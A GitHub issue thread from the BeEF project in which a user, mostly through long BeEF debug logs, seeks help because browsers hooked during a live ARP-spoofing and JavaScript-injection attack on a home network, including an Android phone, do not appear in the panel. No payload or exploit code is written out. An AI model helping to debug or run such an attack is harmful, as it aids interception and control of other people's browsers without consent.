-
Notifications
You must be signed in to change notification settings - Fork 2.2k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Did hooking methods change #2906
Comments
[23:19:30][] Browser screenshot saved to '/home/kali/.beef/screenshot__-2023-08-20_23-19-30_2.png'
journalctl -u beef-xss Memo: This is the Java Script code I am injecting into http web pages. This method didn't cause me problems in the past. Iptables rules sudo iptables -L Chain FORWARD (policy ACCEPT) Chain OUTPUT (policy ACCEPT) sudo iptables -L -t nat Chain INPUT (policy ACCEPT) Chain OUTPUT (policy ACCEPT) Chain POSTROUTING (policy ACCEPT) The script is supposedly being injected and I am kind of having issues with other scripts being injected I also had some what seems to be the problem I did manage to hook the browser the second time around only on the admin page 192.168.1.1 this is on a 5Ghz network Spectrum Router 5260 so that means maybe traffic flow isn't reaching me correctly right if the hook is injecting that means the signal back may be an issue? I did manage to screen capture an all white blank page on the phone as you can see within debug output lol someone please help me diagnose and fix this issue If we request additional information and we don't hear back from you within a week, we will be closing the ticket off. |
I tried to give as much detail regarding Beef-XSS as possible while in production so this is a live output of the attack going on right before this I'll try with other devices here in a bit in order to get you a diagnosis of the output when targeting different models |
Im having the same issue with every android device device awkward |
The issue may be here where apache2 is auto loaded on beef execution Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
|
This issue as been marked as stale due to inactivity and will be closed in 7 days |
First Steps
Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
I don't see it
Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
The wiki was followed as instructed
Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
I don't see anything that can help me
BeEF Version:
Browser Exploitation Framework (BeEF) 0.5.4.0
Ruby Version:
ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
Browser Details (e.g. Chrome v81.0):
New Hooked Browser [id:1, ip:192.168.1.5, browser:FF-91, os:Linux-], hooked domain [192.168.1.5:3000]
Android Nokia G400 5G Chrome App Version 101.0.4951.41
Android Version 12
My Operating system is Linux kali 5.18.0-kali5-amd64 Dynamic Construction Class should not block last packet response #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64 GNU/Linux
Configuration
Copyright (c) 2006-2023 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
BeEF Configuration file
beef:
version: '0.5.4.0'
# More verbose messages (server-side)
debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80
Yes
Yes
Steps to Reproduce
No Errors
Beef Launches and hooks the browser but never shows that the browser has been hooked, doesn't display the browser, and this is during an arp spoof attack.
How to enable and capture detailed logging
config.yaml
in the root directory/usr/share/beef-xss
client_debug
totrue
[23:18:06][>] Using legacy_build_beefjs
[23:18:06][>] Excluding lib/jquery-1.12.4.min.js from core files obfuscation list
[23:18:06][>] Excluding lib/json2.js from core files obfuscation list
[23:18:06][>] Excluding lib/mdetect.js from core files obfuscation list
[23:18:06][>] [Evasion] Loaded obfuscation chain: minify, base_64
[23:18:06][>] [Evasion] Adding bootstrapper for technique: base_64
[23:18:06][>] [Evasion] Applying technique: minify
[23:18:08][>] [OBFUSCATION - Minifier] JavaScript has been minified
[23:18:08][>] [Evasion] Applying technique: base_64
[23:18:08][>] [OBFUSCATION - Base64] Javascript has been base64 encoded
[23:18:08][>] [Evasion] Obfuscation completed (270990 bytes)
[23:18:09][>] [INIT] Processing Browser Details...
[23:18:09][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
[23:18:10][>] Event: 192.168.1.9 just joined the horde from the domain: 192.168.1.1:80
[23:18:10][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[23:18:10][!] [Browser Details] Invalid browser version returned from the hook browser's initial connection.
[23:18:11][>] Event: 192.168.1.9 appears to have come back online
[23:18:12][>] {"lastseen":"1692573491","count":1,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:12][!] [Browser Details] Invalid browser plugins returned from the hook browser's initial connection.
[23:18:12][>] [INIT] Processing Browser Details...
[23:18:12][>] {"lastseen":"1692573492","count":2,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:12][>] [INIT] Processing Browser Details for session bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc
[23:18:12][>] Hooked browser [id:2] has IP [ip: 192.168.1.9]
[23:18:13][>] {"lastseen":"1692573492","count":3,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:13][>] {"lastseen":"1692573493","count":4,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:14][>] {"lastseen":"1692573494","count":5,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:15][>] {"lastseen":"1692573495","count":6,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:15][] New Hooked Browser [id:2, ip:192.168.1.9, browser:UNKNOWN-101.0.0.0, os:Android-], hooked domain [192.168.1.1:80]
[23:18:15][>] Hooked browser has network interface 127.0.0.1
[23:18:16][>] {"lastseen":"1692573495","count":7,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:17][>] {"lastseen":"1692573496","count":8,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:18][>] {"lastseen":"1692573497","count":9,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:19][>] {"lastseen":"1692573498","count":10,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:20][>] {"lastseen":"1692573499","count":11,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:21][>] {"lastseen":"1692573500","count":12,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:22][>] {"lastseen":"1692573502","count":13,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:23][>] {"lastseen":"1692573503","count":14,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:24][>] {"lastseen":"1692573504","count":15,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:25][>] {"lastseen":"1692573505","count":16,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:26][>] {"lastseen":"1692573506","count":17,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:27][>] {"lastseen":"1692573507","count":18,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:28][>] {"lastseen":"1692573508","count":19,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:29][>] {"lastseen":"1692573509","count":20,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:30][>] {"lastseen":"1692573510","count":21,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:31][>] {"lastseen":"1692573511","count":22,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:32][>] {"lastseen":"1692573512","count":23,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:33][>] {"lastseen":"1692573513","count":24,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:34][>] {"lastseen":"1692573514","count":25,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:35][>] {"lastseen":"1692573515","count":26,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:36][>] {"lastseen":"1692573516","count":27,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:37][>] {"lastseen":"1692573517","count":28,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:38][>] {"lastseen":"1692573518","count":29,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:39][>] {"lastseen":"1692573519","count":30,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
[23:18:40][>] {"lastseen":"1692573520","count":31,"id":2,"session":"bqVBaraWXGZ30md7nJeDtnVGcelMcdtsS0xxHctPVzYtChlYBzJJ4IyElQYCV4ZegTNg7t9bYqr5Tukc","ip":"192.168.1.9","firstseen":"1692573489","httpheaders":"{"VERSION":"HTTP/1.1","HOST":"192.168.1.5:3000","CONNECTION":"keep-alive","USER_AGENT":"Mozilla/5.0 (Linux; Android 12; Nokia G400 5G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Mobile Safari/537.36","ACCEPT":"/","REFERER":"http://192.168.1.1/\",\"ACCEPT_ENCODING\":\"gzip, deflate","ACCEPT_LANGUAGE":"en-GB,en-US;q=0.9,en;q=0.8"}","domain":"192.168.1.1","port":80,"is_proxy":null}
